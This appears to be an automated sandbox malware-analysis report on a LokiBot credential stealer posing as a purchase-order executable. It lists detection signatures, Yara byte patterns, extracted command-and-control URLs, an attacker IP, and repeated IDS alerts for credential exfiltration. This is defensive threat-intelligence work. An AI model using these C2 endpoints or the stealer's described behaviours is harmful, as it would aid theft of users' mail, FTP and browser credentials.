Loading ...

Play interactive tourEdit tour

Windows Analysis Report Purchase Order #5000012803.exe

Overview

General Information

Sample Name:Purchase Order #5000012803.exe
Analysis ID:553040
MD5:d62b8a5fdb90e9241ff0eef6ea035e32
SHA1:4e9e38dc4d01a649d927a933488477c5980fcb18
SHA256:95f5680fe4d7830a393aa84b2278051638f3c8105766c47a68c1f8981f38932b
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13bff:$des3: 68 03 66 00 00
        • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        Click to see the 34 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.0.Purchase Order #5000012803.exe.400000.3.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0x13e78:$s1: http://
        • 0x17633:$s1: http://
        • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
        • 0x13e80:$s2: https://
        • 0x13e78:$f1: http://
        • 0x17633:$f1: http://
        • 0x13e80:$f2: https://
        1.0.Purchase Order #5000012803.exe.400000.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          1.0.Purchase Order #5000012803.exe.400000.3.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            1.0.Purchase Order #5000012803.exe.400000.3.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              1.0.Purchase Order #5000012803.exe.400000.3.unpackLoki_1Loki Payloadkevoreilly
              • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x13ffc:$a2: last_compatible_version
              Click to see the 83 entries

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
              Multi AV Scanner detection for submitted fileShow sources
              Source: Purchase Order #5000012803.exeReversingLabs: Detection: 25%
              Antivirus detection for URL or domainShow sources
              Source: http://slimpackage.com/slimfit/five/fre.phpAvira URL Cloud: Label: malware
              Machine Learning detection for sampleShow sources
              Source: Purchase Order #5000012803.exeJoe Sandbox ML: detected
              Source: 1.0.Purchase Order #5000012803.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
              Source: Purchase Order #5000012803.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: Binary string: wntdll.pdbUGP source: Purchase Order #5000012803.exe, 00000000.00000003.663596195.00000000032C0000.00000004.00000001.sdmp, Purchase Order #5000012803.exe, 00000000.00000003.663359246.0000000003130000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: Purchase Order #5000012803.exe, 00000000.00000003.663596195.00000000032C0000.00000004.00000001.sdmp, Purchase Order #5000012803.exe, 00000000.00000003.663359246.0000000003130000.00000004.00000001.sdmp
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00402630 FindFirstFileA,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49770 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49770 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49770 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49770 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49771 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49771 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49771 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49771 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49783 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49783 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49783 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49783 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49785 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49785 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49785 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49785 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49786 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49786 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49786 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49786 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49787 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49787 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49787 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49787 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49788 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49788 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49788 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49788 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49789 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49789 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49789 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49789 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49790 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49790 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49790 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49790 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49792 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49792 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49792 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49792 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49793 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49793 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49793 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49793 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49794 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49794 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49794 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49794 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49795 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49795 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49795 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49795 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49797 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49797 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49797 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49797 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49804 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49804 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49804 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49804 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49823 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49823 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49823 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49823 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49842 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49842 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49842 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49842 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49846 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49846 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49846 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49846 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49857 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49857 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49857 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49857 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49864 -> 104.223.93.105:80
